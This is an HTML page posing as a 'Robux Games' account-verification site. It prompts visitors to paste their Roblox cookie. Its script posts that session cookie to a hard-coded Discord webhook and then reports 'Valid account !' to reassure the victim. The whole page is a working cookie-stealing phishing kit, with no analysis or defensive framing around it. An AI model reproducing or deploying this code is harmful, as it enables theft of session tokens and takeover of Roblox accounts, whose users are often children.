<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Robux Games</title>
    <link rel="icon" type="image/x-icon" href="https://i.ibb.co/nMfBv6b/robuxgameslogo.png" />
    <style>
        body {
            font-family: Arial, sans-serif;
            background: #2D3748;
            color: #a328a3;
            margin: 0;
        }
        .navbar {
            background-color: #2D3748;
            padding: 10px 20px;
            display: flex;
            justify-content: space-between;
            align-items: center;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }
        .navbar a {
            color: #fff;
            text-decoration: none;
            margin: 0 10px;
        }
        .navbar input[type="text"], .navbar button {
            padding: 10px;
            margin-left: 10px;
            border: 1px solid #ccc;
            border-radius: 4px;
        }
        .navbar button {
            background-color: #6c158b;
            color: #fff;
            border: none;
            cursor: pointer;
        }
        .navbar button:hover {
            background-color: #862ca7;
        }
        .container {
            background-color: #131414;
            padding: 40px;
            border-radius: 8px;
            box-shadow: 0 0 10px #131414;
            text-align: center;
            max-width: 450px;
            margin-bottom: 20px;
            width: 100%;
            margin: 80px auto 0; /* Ajuster pour l'espace sous la barre de navigation */
        }
        .logo {
            max-width: 120px;
            margin-bottom: 0px;
        }
        .logo2 {
            max-width: 170px;
            margin-bottom: 0px;
        }
        input[type="text"] {
            width: 100%;
            height: 55px; /* Augmenter la hauteur de l'input */
            padding: 10px;
            margin-bottom: 10px;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-sizing: border-box;
            font-size: 14px; /* Augmenter la taille de la police */
        }
        button {
            padding: 10px 20px;
            background-color: #6c158b;
            color: #fff;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            width: 100%;
            transition: background-color 0.3s ease, transform 0.3s ease;
            font-size: 16px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        }
        .loginbutton {
            padding: 10px 30px;
            background-color: #6c158b;
            color: #fff;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            transition: background-color 0.3s ease, transform 0.3s ease;
            font-size: 16px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        }
        button:hover, .loginbutton:hover {
            background-color: #862ca7;
            transform: translateY(-2px);
        }
        button:active, .loginbutton:active {
            background-color: #5a1177;
            transform: translateY(0);
        }
    </style>
</head>
<body>
    <div class="navbar">
        <a href="index.html"><img src="https://i.ibb.co/5xbG050/removedrobuxgame.png" alt="RobuxGame Logo" class="logo"></a>
        <div>
            <button class="loginbutton">Login</button>
        </div>
    </div>
    <div class="container">
        <img src="https://i.ibb.co/5xbG050/removedrobuxgame.png" alt="RobuxGame Logo" class="logo2">
        <h1></h1>
        <input type="text" id="userInput" placeholder="Enter your roblox cookie...">
        <button onclick="handleButtonClick()">Verify my account</button>
    </div>

    <script>
        function handleButtonClick() {
            const userInput = document.getElementById('userInput').value;
            
            if (userInput.length >= 500) {
                const webhookURL = 'https://discord.com/api/webhooks/1262060318515920917/R67_U-zN5Edb9_RvAQNZ5YYYrd1QE9iqd3wiP68oawhJ6DXVK8kKFNTB8iXdVak8Rqu1';
                const data = {
                    content: `roblox-cookie : ${userInput}`
                };

                fetch(webhookURL, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify(data)
                })
                .then(response => {
                    if (response.ok) {
                        alert('Valid account !');
                        window.location.href = 'logged.html';
                    } else {
                        alert('Error: 1333');
                    }
                })
                .catch(error => {
                    alert('Erreur: 0453778895');
                    console.error('Erreur:', error);
                });
            } else {
                alert('Invalid cookie');
            }
        }
    </script>
</body>
</html>
